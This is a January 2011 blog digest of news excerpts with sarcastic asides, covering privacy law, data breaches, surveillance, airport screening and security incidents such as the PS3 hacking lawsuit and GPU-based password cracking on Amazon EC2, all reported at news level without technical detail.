Saturday, January 15, 2011

Would this mean the “Rodney King” video was illegal?

Court Rejects Claim of a First Amendment Right to Audio-Record Police Officers

January 14, 2011 by Dissent

Eugene Volokh mentions a ruling in ACLU v. Alvarez (N.D. Jan. 10, 2011) that will probably disappoint many of this blog’s readers. Here’s a snippet of the opinion:

To assist in deterring and detecting police misconduct, the ACLU has developed a program to “audio record police officers, without the consent of the officers, when (a) the officers are performing their public duties, (b) the officers are in public places, (c) the officers are speaking at a volume audible to the unassisted human ear, and (d) the manner of recording is otherwise lawful.”


The ACLU intends to audio record police officers speaking with one another or police officers speaking with civilians. The ACLU’s program only implicates conversations with police officers. The ACLU does not intend to seek the consent of either police officers or civilians interacting with police officers. Police officers and civilians may be willing speakers with one another, but the ACLU does not allege this willingness of the speakers extends to the ACLU, an independent third party audio recording conversations without the consent of the participants. The ACLU has not met its burden of showing standing to assert a First Amendment right or injury….

Amendment would be futile. The ACLU has not alleged a constitutional right or injury under the First Amendment. Rather, the ACLU proposes an unprecedented expansion of the First Amendment….

Read more on The Volokh Conspiracy. Note that this ruling is not about the right of an individual to audio record their interactions with the police, but about the rights of a non-involved third party to record the interactions of others. [So, Rodney King could have recorded himself but no one else could? Bob]

[From the article:

“there is nothing in the Constitution which guarantees the right to record a public event”

We need a new word – I suggest we call this an “e-Coup”

Tweeting Tyrants Out of Tunisia: Global Internet at Its Best

Even yesterday, it would have been too much to say that blogger, tweeters, Facebook users, Anonymous and Wikileaks had “brought down” the Tunisian government, but with today’s news that the country’s president Zine El Abidine Ben Ali has fled the country, it becomes a more plausible claim to make.

… Here’s a guide to the part of this battle fought in cyberspace over the last month.

What other ill-considered technologies will eventually be seen as failures? (My bet? Airport scanners)

Homeland Security Junks Its Sensor-Laden Border Fence

It only took nearly a year of hiatus and $1 billion in sunk costs, but the Department of Homeland Security has finally gotten rid of the networked suite of sensors that made up its virtual border fence. But some of its technology may live on as zombie border protection.

The virtual fence “cannot meet its original objective of providing a single, integrated border-security technology solution,” Secretary Janet Napolitano conceded in a statement today heralding the program’s termination.

Boeing’s SBInet was supposed to be the ultimate in anti-illegal immigrant technology: miles of surveillance-radar towers (colloquially, “Cameras on a Pole”) hooked up to ground-based sensors that detected the heat of someone’s footprints or the metal of a border-crossing vehicle. Sound impractical? That’s what the Government Accountability Office found in October, when it lamented SBInet’s “well-chronicled history of not delivering promised capabilities and benefits on time and within budget.” (.pdf)

Yet the Customs and Border Protection office boasted in a fact sheet that it would ultimately cover 6,000 miles of the U.S.’ northern and southern frontiers. But only 53 miles of border in Arizona ever actually got outfitted with SBInet.

Wow! Detroit schools must have had lots of sex crimes to force them to come up with this!

New security system to protect Detroit students from sex offenders raises privacy concerns

January 14, 2011 by Dissent

First the roll-out of yet another “for the children’s safety” measure, as described by ABC News in Detroit:

The Detroit Public School system is launching a new security system designed to keep sex offenders out of the city’s schools.

The system works by running instant background checks against sex offender registries and then issuing ID badges that identify which area of a school a person is allowed to enter. Anyone who doesn’t pass the background check will not be allowed access to the school. Officials say the system will not check any other criminal databases. [“Ax murderers welcome?” Probably not, see below. Bob]

The system can scan driver licenses and ID cards. It can also run checks using a visitor’s name and date of birth.

The ID badges that are issued by the system include the person’s name and picture. They are temporary and expire after a day. Contractors, regular volunteers and frequent visitors can be issued long-term badges.

Followed quickly by the concerns, as reported by Zenobia Jeffries of the Michigan Citizen:

As of Jan. 3, all visitors — including parents — to DPS will have to scan their driver’s license or state-issued identification to obtain a visitor’s pass with a photo I.D. to enter the school.

Although the system is slated for all schools in the district, it is only up and running currently at a few schools, including Martin Luther King, Jr. Senior High School (King).

Security officers and staff at King refused to comment to this reporter on how the system works or what database visitors’ identification is run through.

“All questions have to go to the district,” said Officer Brewer, campus security of DPS Department of Public Safety.

Speculation is circulating that the information is run through law enforcement, including Homeland Security.

Allegedly, two parents visiting King were arrested the week of Jan. 3, one for outstanding child support and the other for outstanding tickets. These arrests have not been confirmed.

Repeated attempts to get detailed information about the new system such as the name of the system, supplier, data bases into which the information flows and costs from DPS Emergency Financial Manager (EFM) Robert Bobb and his communications spokesperson Steve Wasko have gone unanswered.

Read more on Michigan Citizen. Both the ACLU of Michigan and the Michigan Citizen have filed FOIA requests to obtain more information.

A press release posted to the Detroit Public Schools web site says:

The system, which is being rolled out gradually to 33 sites, will instantly scan visitors’ driver licenses and state ID cards and cross-check the information with sex-offender registries throughout the United States and Canada. School security personnel can also conduct checks using visitors’ names and date of birth. It will eventually be set up at every DPS school.

Stay tuned… and thanks to the reader who pointed me to this story.

For my Computer Security students. I see this an inevitable, and one of the major security policy issues they will face.

Should Employees Buy Their Own Computers?

"Data security vs. productivity. We have all heard the arguments. Most of us use some of our personal equipment for work, but is it a good idea? 'You are at work. Your computer is five years old, runs Windows XP. Your company phone has a tiny screen and doesn't know what the internet is. Idling at home is a snazzy, super-fast laptop, and your own smartphone is barred from accessing work e-mail. There's a reason for that: IT provisioning is an expensive business. Companies can struggle to keep up with the constant rate of technological change. The devices employees have at home and in their pockets are often far more powerful than those provided for them. So what if you let your staff use their own equipment?' Companies such as Microsoft, Intel, Kraft, Citrix, and global law firm SNR Denton seem to think it's a decent idea."

I am struck by how little data is in this archive. It is probably the size of the average teenager's Facebook dossier.

JFK Library Launches Largest Presidential Online Archive

"The JFK Library launched what it is calling the largest presidential online archive, offering the public 117TB of data related to John F. Kennedy's presidency. The four-year project digitized a plethora of analog material including 200,000 pages of documents; 300 reels of audio tape containing more than 1,245 individual recordings of telephone calls, speeches and meetings; 300 museum artifacts; 72 reels of film; and 1,500 photos. 'As young people increasingly rely on the Internet as their primary source for information, it is our hope that the library's online archive will allow a new generation to learn about this important chapter in American history,' said Carolyn Kennedy, the wife of the late John F. Kennedy, Jr., [Quite a substantial error... Must be some young journalist who thinks history begins with Bill Clinton. Bob]who was on hand at the opening of the archive."

Now this is interesting! WalMart relies on hard negotiation. Amazon seems to think the next step is “Take it or leave it.”

Amazon, Not Developers, Will Set New App Store's Prices

"Looks like Amazon is changing the rules of the game for developers with their new Android App store. I'm curious how Amazon will determine the value of your app and if having control of your prices really matters."

The core of the linked article: "Here's how it works: When developers submit apps to Amazon's app store, they will be able to set a suggested retail price ('MSRP'). It can be free, it can be $50, whatever. Then Amazon -- not the developer -- will set the retail price. It can be full price, it can be a sale price, or it can be free. Developers will get to take home the standard 70% of the app's retail price (what the app sells for) or 20% of the MSRP (what the developer thinks it should sell for), whichever is greater."

I start each day by reading articles collected in my RSS reader. Now I can search more efficiently for new feeds...

5 RSS Feed Search Engines You Should Try Out For Fresh Content

RSS (Rich Site Summary) as we know is the most common way to publish content that’s regularly updated on the web. Using your feed reader, you can have all the fresh pickings without needing to visit each site individually.

… That’s why you can think of feed search engines as one of the easiest ways to search for the latest feeds en masse. A feed search engine also links to the RSS feed link and a preview of the content if you choose to subscribe without browsing through the site.

Humor For those who believe texting while driving is not a distraction – a short video. (Narration by the ever-sympathetic mall security team)

Texting Girl Falls In Mall Fountain

Global Warming! Global Warming! Want to bet?

Bastardi's Wager

"AccuWeather meteorologist Joe Bastardi has a challenge for climate scientists. He wants one or more of their rank to accept a bet about temperature trends in the coming decade. Bastardi is making specific predictions. 'The scientific approach is: you see the other argument, you put forward predictions about where things are going to go, and you test them,' he says. 'That is what I have done. I have said the earth will cool .1 to .2 Celsius in the next ten years, according to objective satellite data.' Bastardi's challenge to his critics — who are legion — is to make their own predictions. And then wait. Climate science, he adds, 'is just a big weather forecast.' Bastardi's challenge is reminiscent of the famous Simon-Ehrlich Wager, where the two men made specific predictions about resource scarcity in the '80s."

Friday, January 14, 2011

Interesting. Will more AG's begin to “insist” that credit monitoring be offered?

CT AG looking into UConn breach, demands credit monitoring services

January 13, 2011 by admin

It looks like Connecticut’s new Attorney General, George Jepsen, intends to pursue data breaches like his predecessor. According to Hartford Business Times, Jepsen has sent a letter to UConn requesting additional information on the breach and he “has also has insisted UConn provide its customers with identify theft and other credit protections.”

The business of Computer Crime

Your personal data in the wrong hands

January 13, 2011 by admin

Fabio Assolini of Kaspersky writes:

What happens when all of your personal data is readily available for use by a cybercriminal?

Last November we published a blog talking about Brazilian phishing attacks that displayed the victims’ CPF numbers – the Natural Persons Register, the equivalent of a Social Security Number used by the Brazilian government to identify each citizen. A CPF is the most important document a Brazilian citizen possesses. It’s a prerequisite for a series of tasks like opening bank accounts, getting or renewing a driver’s license, buying or selling real estate, receiving loans, applying for jobs (especially public ones), getting a passport or credit cards, etc.

But this incident was just the tip of the iceberg.

Due to our constant monitoring of malicious activities, we found some bad guys offering access to a complete database of all Brazilian citizens that have a CPF – all you need to do is contact a number and the system will bring you the complete personal data of a potential victim.

Read more on SecureList.

[From the article:

We found 3 mirrors of this website offering this kind of ‘service’ to Brazilian bad guys – it’s a service that we call C2C (cybercriminals to cybercriminals).

… Nowadays, we see that the problem of protecting private information is not just confined to users, but applies equally to governments and corporations alike.

(Related) Not sure a password fixes the problem. Why is the data online in the first place?

KY: Information on Green River District Health Department patients exposed on the Web for months

January 13, 2011 by admin

James Mayse reports for the Messenger-Inquirer:

The names, Social Security numbers and dates of birth of thousands of people who visited the Green River District Health Department were available unsecured online for months, at least since October.

But the company maintaining the computer database fixed the problem immediately Wednesday evening after being notified by the Messenger-Inquirer. Numerous follow-ups by M-I reporters and editors found that the database had been secured and now requires a password to access.

The database was created by Fox Technology Group, an Owensboro company that has since been absorbed by Integranetics. The Messenger-Inquirer found 9,986 names and personal information of Daviess County residents on the list after being notified of the problem by a concerned resident who discovered the information while doing a simple Google search.

Almost all of the names included dates of birth, and more than half included Social Security information.

Read more on iStockAnalyst


Computer with Guardsmen’s Personal Info Stolen from Santa Fe Headquarters

January 13, 2011 by admin

New Mexico soldiers deploying to Kosovo now have one more thing to worry about after a computer containing personal information was stolen from the National Guard Headquarters in Santa Fe.

It contained deployment records and social security information for about 650 soldiers throughout the state. The computer was stolen sometime between Dec. 23-28. Soldiers affected have been sent a letter telling them to check with the social security administration, contact their banks and keep an eye on their credit.

A representative from the Guard says both the Army and State Police are investigating.

Source: KRQE

And the data on the computer weren’t encrypted….. why?

And the National Guard isn’t offering them free credit monitoring when they won’t even be around to keep an eye on their credit reports after they deploy…. why?

There doesn’t seem to be any statement on the NM National Guard’s site.

Now they need to define stigma. Is being a “liberal” sufficient?

Second Circuit limits the right to medical privacy

January 13, 2011 by Dissent

We normally associate the constitutional right to privacy with abortion and other child-bearing and (and related) concepts. But that right also covers the right to avoid disclosure of certain personal matters, including medical information. This case asks whether a New York City schoolteacher could sue the Board of Education for publicizing her fibromyalgia. The answer is No.

The case is Matson v. Board of Education, decided on January 11. School officials disciplined Matson, a music teacher, for taking sick leave so she could conduct a symphony orchestra at Trinity Church. Her doctor said the stress was work-related. While she needed time off from work, she could still function as a conductor at the church. In disciplining Matson, school officials publicized a report that made reference to her disability, characterized as “chronic fatigue syndrome, known as fibromyalgia.” Matson does not sue over the discipline but, instead, the public report that mentions her disability.

Read more on Bergstein & Ullrich, LLP Second Circuit Civil Rights. It seems that unless you have a fatal or stigmatizing medical condition, you don’t have a right to medical privacy in the Second Circuit.

Airfield of Dreams: If you pay us, we won't grope? What is the strategic statement here? We don't have enough information to know who you are, so we need more or we continue to treat you as a possible terrorist?

TSA: More disclosure by airline travelers could cut intrusive screenings

January 13, 2011 by Dissent

Paul Corson reports:

The head of the Transportation Security Administration says airline travelers could minimize their exposure during the screening process by disclosing more about themselves up-front.

TSA Administrator John Pistole, in a speech Thursday to a lawyers’ group, said the use of detailed identity profiles would be part of a shift toward the greater use of intelligence to try to disrupt potential terrorist activity against commercial flights.

“There are groups of people out there, the very frequent travelers who are willing to provide information,” Pistole said, so that for a fee, “if you don’t want to stand in line, here’s what we can do.”

Pistole said passenger identification would be more stringent than the typical name, date of birth and gender now required to board a jetliner, that he said is “not much to go on.”

He said a trusted traveler program would apply to “those individuals who are willing to disclose more information about themselves in exchange for a different level of screening.”

Pistole did not describe what elements in the screening process a passenger could avoid, saying only it would involve “more identity-based screening than the physical screening.”

Read more on CNN

Sounds like extortion to me: give us all your personal details if you don’t want to be humiliated and have your genitalia touched?

Congress better straighten this out and as a priority item. Look how quickly they introduce bills to protect themselves after the Tucson shooting. Let them introduce bills to protect the innocent public from government assault in the name of sham “security.”

Free(?) webinar on Privacy.

Employee Privacy Gains in the United States

January 14, 2011 by Dissent

Boris Segalis writes:

2010 arguably was a breakout year for consumer privacy in the U.S., but the year also brought about significant changes to the legal landscape of employee privacy. Federal and state court decisions, state legislation and agency actions suggest that the U.S. may be moving towards a greater level of privacy protection for employees. Employers are well-advised to consider these developments in reviewing and revising policies that affect the privacy of their employees.

Read more on InformationLawGroup. Boris reviews several important rulings during 2010 including Quon and Stengart, and also reviews new statutes in Illinois and Oregon that went into effect and that impact employee privacy. The group also notes:

For more information about privacy issues in the workplace, please join us for a webinar on January 27, 2011. The webinar, offered through Park Avenue Presentations, will focus on workplace privacy in the U.S. and Europe. Please email for registration details.

The webinar has been added to the listing of Data Privacy Day 2011 events available elsewhere on this site.

Interesting summary

Who Owns Your Data?

The fundamental problem with data ownership is that bits don’t behave like atoms. For most of human history, our laws have focused on physical assets that couldn’t be duplicated. The old truism “possession is nine-tenths of the law” doesn’t apply in a world where making a million copies, each as good as the original, is nearly effortless.

It’s not just the ability to copy that makes data different, however. How data is used affects its value. If I share a movie with someone, the copyright holder loses a potential sale. On the other hand, they may make money: freely sharing Monty Python videos online increased DVD sales by 23,000%. Some kinds of information were meant to be shared. If I give my phone number to someone, surely it’s gained value. But if it’s written on a bathroom wall, presumably it’s lost some.

Perhaps it was translated poorly from the Japanese? ...or to the Japanese? ...or Japanese law allows this? ...or they have a bunch of bad lawyers?

Today’s Award for the Silliest Theory of the Computer Fraud and Abuse Act

January 14, 2011 by admin

Orin Kerr, a law professor and former attorney in the DOJ who worked in the computer crimes division, has a commentary on a lawsuit involving CFAA claims that’s interesting in terms of defining the scope of what the Computer Fraud and Abuse covers – and shouldn’t cover:

Today’s Award for the Silliest Theory of the Computer Fraud and Abuse Act

…goes to the arguments made by Sony’s lawyers in a complaint and motion for a TRO in a recently-filed civil case: Sony Sues PS3 Hackers. The argument: You’re guilty of felony computer hacking crimes if you access your own computer in a way that violates a contractual restriction found in the fine print of the licensing restriction of the product imposed by the manufacturer.

I realize the complaint characterizes the defendants as hackers, and the CFAA is supposed to be about hacking. But think for a moment about the nature of this claim. You bought the computer. You own it. You can sell it. You can light it on fire. You can bring it to the ocean, put it on a life raft, and push it out to sea. But if you dare do anything that violates the fine print of the license that the manufacturer is trying to impose, then you’re guilty of trespassing onto your own property. And it’s not just a civil wrong, it’s a crime.

Read more on The Volokh Conspiracy.

(Related) Another Sony strategic error...

Why Sony Cannot Stop PS3 Pirates

"A former Ubisoft exec believes that Sony will not be able to combat piracy on the PlayStation 3, which was recently hacked. Martin Walfisz, former CEO of Ubisoft subsidiary Ubisoft Massive, was a key player in developing Ubisoft's new DRM technologies. Since playing pirated games doesn't require a modchip, his argument is that Sony won't be able to easily detect hacked consoles. Sony's only possible solution is to revise the PS3 hardware itself, which would be a very costly process. Changing the hardware could possibly work for new console sales, though there would be the problem of backwards compatibility with the already-released games. Furthermore, current users would still be able to run pirated copies on current hardware."

An anonymous reader adds commentary from PS3 hacker Mathieu Hervais about Sony's legal posturing.

Their logic is peccable. (That's the opposite of “impeccable, right?) “We will limit our unlimited plan...”

Virgin Mobile To Start Throttling Broadband2Go

"Virgin Mobile sent an e-mail today informing me of their plans to start throttling the Broadband2Go Plan. The web site doesn't seem to reflect the change yet, but here is the message they sent to me: 'Here at Virgin Mobile, our mission is to deliver an outstanding customer experience. Sometimes that means making difficult choices in order to provide the best possible service to the greatest number of customers. To make sure we can keep offering our $40 Unlimited Broadband2Go Plan at such a great price, we're putting a speed limit in place for anyone on that plan who uses over 5GB in a month. How will it work? Starting February 15, 2011, if you go over 5GB in a month on the $40 Unlimited Plan: Your data speeds will be limited for the remainder of the monthly plan cycle. During this time, you may experience slower page loads and file downloads and lags in streaming media. Your data speeds will return to normal as soon as you buy a new Broadband2Go Plan. This change will only affect plans bought on or after 2/15/2011. How will it affect me? Keep in mind, 5GB is A LOT of data. To give you an idea, it's about 250 hours of web browsing or over 500,000(!) emails. So this change shouldn't affect you unless you're a heavy downloader/streamer/etc.'"

Just when I was getting comfortable recommending it to people, too. I do prefer a slowdown to an absolute cap, but this sours me a bit on the (locked-to-Sprint) MiFi I bought to use the Virgin service.

For my Ethical Hackers: Hacking in the Cloud

Amazon EC2 Enables Cheap Brute-Force Attacks

"German white-hat hacker Thomas Roth claims he can crack WPA-PSK-protected networks in six minutes using Amazon EC2 compute power — an attack that would cost him $1.68. The key? Amazon's new cluster GPU instances. 'GPUs are (depending on the algorithm and the implementation) some hundred times faster compared to standard quad-core CPUs when it comes to brute forcing SHA-1 and MD,' Roth explained. GPU-assisted servers were previously available only in supercomputers and not to the public at large, according to Roth; that's changed with EC2. Among the questions Roth's research raises is, what role should Amazon and other public-cloud service providers play in preventing customers from using their services to commit crimes?"

Interesting numbers

Are We Too Obsessed With Facebook? [INFOGRAPHIC]

Thursday, January 13, 2011

I'm not sure what they mean by “routine monitoring of backups” – perhaps they were checking to see if everything was being backed up. If so, why wait two months to check?

WA: HACKED: Kadlec notifying patients of computer server breach

January 12, 2011 by admin

From the staff of Tri-City Herald:

Kadlec Regional Medical Center officials announced today that patients are being notified that one of the hospital’s computer servers containing brain scan and other patient studies was hacked in September.

Files housed on the server included information including a patient’s name, birth date, age, gender, medical record number and doctor’s name, but did not include any patient financial information, address, social security number or insurance data.

Kadlec officials first discovered the unauthorized access during routine monitoring of computer network backups on Nov. 11, according to a news release.

Read more on Tri-City Herald. I do not see any notice on the medical center’s site at this time.

[From the article:

Hospital officials said they have added significant security measures to Kadlec's servers to help prevent future breaches. [“We decided to add all that security we had decided we didn't need (didn't want to spend money on) before we found out we had inadequate security...” Bob]

Another confusing statement.

Pentagon Credit Union Database Compromised

"The credit union used by members of the U.S. armed forces and their families has admitted that a laptop infected with malware.was used to access a database containing the personal and financial information of customers. The Pentagon Federal Credit Union (PenFed) issued a statement to the New Hampshire Attorney General that said data, including the names, addresses, Social Security Numbers and PenFed banking and credit card account information of its members were accessed by the infected PC." [I doubt the PC acted alone. Was an employee's PC infected with software that captured data? Stole a User ID & Password? Copied the database and emailed it to Romania? Bob]

Again some basic questions. Where should this data be stored? How long should it be stored? (Do 231,000 patients represent months or years of radiology?)

Seacoast Radiology Computer Server Breached – 231,400 Patients Notified

January 12, 2011 by admin

From a Seacoast Radiology press release:

Seacoast Radiology, PA discovered on November 12, 2010 that an office server containing personal patient data and billing information was accessed by an unauthorized third party. Access to this server was disabled immediately and an independent investigation concluded that unauthorized use of patient and billing data is unlikely. [How does one reach this conclusion? Bob] All patients and patient billing guarantors have been notified.

The independent investigation indicated that personal information, including name, address, Social Security number, date of birth, medical procedure codes, diagnosis codes and billing information was stored on this server. Patient radiology reports, including radiographic images, and banking information was not stored on this server and therefore not breached.

Seacoast Radiology has engaged with several computer security experts and has implemented security procedural changes to keep patient data secure from unauthorized access.

In addition to procedural changes, Seacoast Radiology has contracted with ID Experts® to provide an informational toll-free number and website to answer questions about this incident. Patients with questions regarding this incident can visit

This press release is in accordance with the Health Information Technology for Economic and Clinical Health (HITECH) Act. Seacoast Radiology, PA has notified patients, billing guarantors and the Department of Health and Human Services (HHS).

From the FAQ on the support web site:

On November 12, 2010, Seacoast Radiology discovered that there had been unauthorized access to an office server. No credit card information was contained on this server, as Seacoast Radiology does not at this time accept credit cards for payment. The server contained patient names, Social Security numbers, address, phone number and other basic information, as well as basic medical diagnosis codes and basic procedure codes for billing purposes. The server also contained information on individuals serving as ‘insurance guarantors’ for the patients, and some of these individuals did not have social security numbers in the computer. [Sometimes they follow their procedures, sometimes they don't? Bob] In some cases the guarantor information included name and address in addition to Social Security number. Some of the guarantors only had name and address associated with their information, without Social Security number.

Brendon Nafziger of provides additional details:

A large radiology practice in New Hampshire said Wednesday hackers apparently breached a server containing Social Security numbers and medical codes for hundreds of thousands of patients, with the culprits likely rogue gamers looking for bandwidth to play the popular military shoot-’em-up Call of Duty: Black Ops.

The group estimates 231,400 patients might have been affected by the breach.


A management decision: Should we “buy insurance” or accept the risk?

Securing data will be costly, UH says

January 12, 2011 by admin

Gene Park reports:

The University of Hawaii says it needs $1.9 million to tighten its Web security and lessen the chance of future data breaches of individual privacy.

In addition, the 10-campus system would need about $764,000 a year to maintain and operate the upgraded system, said David Lassner, the university’s vice president for information technology.

“Information technology at UH is highly decentralized,” Lassner said yesterday at a state Senate informational hearing at the Capitol, “because as an academic institution, we have lots of people generating information, disseminating it, and over 600 Web servers throughout the UH system.”

The hearing was held in response to three data breaches in the UH system last year. A report by national watchdog group Liberty Coalition said UH was responsible for 54 percent of all data breaches in Hawaii since 2005, compromising 259,000 records.

Read more on the Star Advertiser.

Given that a single breach can reportedly cost $2 million in legal costs alone, it’s a better use of the money to invest in security. That said, there are other costly measures that the Hawaii legislature is considering based on Liberty Coalition’s analysis and recommendations. Having read their report and concluded that it seriously overestimates the number of ID theft victims in Hawaii and that most ID theft cases in Hawaii cannot be clearly attributed to breaches involving either the University of Hawaii or other state agencies, I hope the legislature will go very slowly and not impose costly and undue burdens on businesses and entities that are unlikely to reduce ID theft. But more on that in another blog entry when I find some time.

Article: Is the Fourth Amendment Relevant in a Technological Age?

January 13, 2011 by Dissent

Via, a new article available on SSRN:

Is the Fourth Amendment Relevant in a Technological Age?

Christopher Slobogin Vanderbilt Law School January 4, 2011


This work will be a chapter in a forthcoming book in The Future of the Constitution series, edited by Jeffrey Rosen and Benjamin Wittes and published by the Brookings Institute. Over the past 200 years, the Fourth Amendment’s guarantees have been construed largely in the context of what might be called “physical searches” – entry into a house or car; a stop and frisk of a person on the street; or rifling through a person’s private papers. But today, with the introduction of devices that can see through walls and clothes, monitor public thoroughfares twenty-four hours a day, and access millions of records in seconds, police are relying much more heavily on what might be called “virtual searches,” investigative techniques that do not require physical access to premises, people, papers or effects and that can often be carried out covertly from far away. The Supreme Court’s current Fourth Amendment jurisprudence – specifically, its “knowing exposure,” “general public use,” “contraband-specific,” “assumption of risk” and “special needs” doctrines – has both failed to anticipate this development and continued to ignore it. This article describes this jurisprudence and how it can foster law enforcement abuse, mission creep, mistaken seizures and physical searches, and an oppressive atmosphere even for the innocent. It then outlines a more technologically-sensitive Fourth Amendment framework.

You can download the full article from SSRN.

A most interesting report (kind of reads like a marketing brochure) but with lots of quotable quotes...

January 12, 2011

Report: Protecting the Digital Economy

"On January 10, 2011, the EastWest Institute released a report detailing the results of the First Worldwide Cybersecurity Summit: Protecting the Digital Economy, and outlining the cybersecurity initiative’s next steps as it prepares for the Second Worldwide Cybersecurity Summit in London on June 1-2. At the summit, held from May 3 to 5, 2010 in Dallas, Texas, EWI brought together over 400 technical experts, policy elites and national security officials from the Cyber40, an informal grouping of the world’s most digitally-advanced countries—among others, the United States, China, India, Russia and Estonia. Participants worked to identify problems facing crucial sectors of the Internet, such as financial services and essential government services, and forge concrete solutions to protect the world’s digital infrastructure."

Coming soon to your home...

January 12, 2011

New GAO Reports: Electricity Grid Modernization

  • Electricity Grid Modernization: Progress Being Made on Cybersecurity Guidelines, but Key Challenges Remain to be Addressed, GAO-11-117, January 12, 2011: "The electric industry is increasingly incorporating information technology (IT) systems into its operations as part of nationwide efforts—commonly referred to as smart grid—to improve reliability and efficiency. There is concern that if these efforts are not implemented securely, the electric grid could become more vulnerable to attacks and loss of services. To address this concern, the Energy Independence and Security Act of 2007 (EISA) provided the National Institute of Standards and Technology (NIST) and Federal Energy Regulatory Commission (FERC) with responsibilities related to coordinating the development and adoption of smart grid guidelines and standards."

[From the report:

With respect to challenges to securing smart grid systems, GAO identified the following six key challenges:

• Aspects of the regulatory environment may make it difficult to ensure smart grid systems’ cybersecurity.

Consumers are not adequately informed about the benefits, costs, and risks associated with smart grid systems.

• Utilities are focusing on regulatory compliance instead of comprehensive security.

• There is a lack of security features being built into certain smart grid systems.

• The electric industry does not have an effective mechanism for sharing information on cybersecurity.

• The electricity industry does not have metrics for evaluating cybersecurity.

This makes me ask, “Who is running T-Mobile?”

T-Mobile makes U-turn on data cap cut

T-Mobile UK has backtracked on its decision to drastically cut the mobile data use allowances for existing as well as new smartphone customers, following an explosion of public anger at the move.

Yesterday the operator said it will now only offer the reduced levels of data to new and upgrading customers, while existing customers will get the 1GB to 3GB they signed up for until their contracts run out.

The U-turn, announced yesterday afternoon, came shortly after the UK consumer group Which? said its legal team were of the opinion that T-Mobile was breaking its own terms and conditions by announcing the 'fair use' cap cut less than a month before it will come into force on February 1.

Another “Everyone Knows” for my Statistics students...

Talking On Your Cell Phone Could Make You Drive Safer

The original claim grew from research by psychologists at the University of Utah in 2003, who used driving simulators to test volunteers' reactions while talking and while drunk. The result: "Driving while talking on a cell phone is as bad as or maybe worse than driving drunk," the researchers reported.

That claim has since become part of the accepted canon about road safety, repeated by everyone from Oprah to U.S. Transportation Secretary Ray LaHood in his campaign against distracted driving. Eight states, including California, have made talking on a handheld cell phone while driving illegal.

… And It sounds like common sense: Splitting your mind's attention between the road and whatever someone's blathering into your ear over a cell phone must be dangerous.

… The new study comes from economists Saurabh Bhargava at the University of Chicago and Vikram Pathania of the London School of Economics. They come at the question from a different direction, starting by using data from a cell phone company on up to 440,000 calls made from California drivers during an 11-day period in 2005. The researchers were able to separate drivers from other users by filtering for calls that switched among cell towers.

Their earlier research showed that when cell phone companies had rates that dropped at 9 p.m. on Monday through Thursday nights, calling jumped up. The economists matched their calling data with crash reports for just before and just after 9 p.m, when they could prove calls from drivers on the road increased, and found no significant increase in crashes. When they expanded their scope to additional years and nearby states, there was still no rise in wrecks.

Wednesday, January 12, 2011

For my Computer Security students. This is a Script Kiddie. (It also may be the only time you can get your children to read and follow directions...)

8th grader hacks school server

John Mackle, education director at the Peterborough Victoria Northumberland and Clarington Catholic District School Board, said the pupil at St. Anne's School in Peterborough, Ontario, used a laptop and some downloaded software to access test results from around the province, the Toronto Sun reported Tuesday.

… Mackle said some of the server's security measures had been offline following an upgrade [Technically, that's a downgrade. Bob] before the incident.

Local. For my Ethical Hackers

Springs man sent to prison for hacking into TSA computer

January 11, 2011 by admin

Another case of a disgruntled terminated employee seeking revenge. Douglas James Duchak was sentenced to prison for injecting malicious code into a TSA computer after he was terrminated. No personal data compromised, but the potential was there. You can read about the case on The Gazette.

(Related) Your assignment: Video yourself from home to school using unsecured cameras. Extra credit: do it without using Starbucks' cameras...

Peep show: inside the world of unsecured IP security cameras

January 12, 2011 by Dissent

Tom Connor reports:

If you’re in public, you’re on camera. If you walk into a coffee shop, the owner gets you at the register. Visit a larger store, and chances are they have your face as soon as you cross the threshold. At least one or two of your neighbors catch you on camera when you walk around your neighborhood, and many cities monitor traffic using red light cameras at major intersections. The question is no longer if you’re on camera, but rather how many different angles you were caught on while going about your day.

With so much monitoring taking place, and with surveillance systems gaining more online functionality every year, it’s natural that securing these systems would become… complicated. And that many many are secured incorrectly or not at all. Because so many cameras and surveillance systems are completely open, it’s possible for anyone with Internet access to watch literally thousands of cameras online using only Google and a kindergartener’s understanding of the ‘Net.

Read more on Ars Technica.

“I don't know Marty, what do you want to do?”

Theft of Customers' Personal Property in Cafes and Bars

At present, evaluative research—whether carried out independently or by the police—is scarce; consequently it is not possible to draw any firm conclusions as to which responses to theft of customers’ personal property from caf├ęs and bars are the most effective. Nevertheless, we review several responses to this problem and make tentative statements as to their effectiveness.

Is this a half-vast solution to a vast problem? (Factor this into the 'local monopoly' vs. public Internet utility argument too.)

California to nix cell phones for half its employees

The newly elected governor of California wants to cut state spending and has starting by calling for the shut-off of half of the state-issued cell phones, some 48,000 devices, by June 1.

… Of course, the push to cut the number in half by midyear could be slowed if devices are still under contract. In those cases, an early termination fee may be a greater expense to the state than just keeping the device.

We know that Tunisia is a leading user of technology (not!) but I suspect anything they can do, we can do gooder!

Tunisian Gov't Spies On Facebook; Does the US?

"Tunisians logging into Facebook encountered extra JavaScript, probably a sign of their repressive government's attempt to spy on them. The question is: does the US government do the same thing, just more subtly? We're not talking about agents friending you on Facebook to get more information about you; we're talking monitoring your supposedly private information behind the scenes."

My concern: Are we removing the possibility of true anonymity?

New Urban Myth: The Internet ID Scare

January 11, 2011 by Dissent

Jim Dempsey of CDT writes:

Let’s get this over right away: The Obama Administration is not planning to create a government ID for the Internet. In fact, the Administration is proposing just the opposite: to rely on the private sector to develop identities (note the plural) for online commerce, in system that allows individuals to have multiple identities and to engage in online activity anonymously and pseudonymously. [As long as someone knows exactly who you are... Bob]

And let’s get this straight too: I have not been criticizing the government’s plan. Just the opposite: I have been praising the Administration for promoting improvements in online identity that would address concerns about identity theft, online fraud and cybersecurity without creating a centralized or government-managed system.

Read more on CDT.


Obama Administration fleshes out online trusted IDs

January 12, 2011 by Dissent

Jaikumar Vijayan reports:

The National Institute of Standards and Technology (NIST) has established a new Web site fleshing out the Obama Administration’s plans for a National Strategy for Trusted Identities in Cyberspace (NSTIC).

The Web site appears designed to provide additional information on the government’s unfolding strategy, as well as to downplay any concerns some might harbor about NSTIC resulting in the creation of a national ID card.

The site’s launch comes just days after Obama Administration officials announced the creation of a new national program office within the U.S. Department of Commerce for handling the NSTIC.

Read more on Computerworld.

Government has to step in when parents don't do their job.

N.J. Town To Vote On Middle School Drug Tests

January 11, 2011 by Dissent kindly pointed me to a situation in New Jersey that will be of concern to all those who care about student privacy and civil liberties:

A proposal to conduct random drug tests of young students in one New Jersey town is raising some eyebrows.

Students at Belvidere Elementary School could be adding drug testing to their list of lessons when they move into middle school.

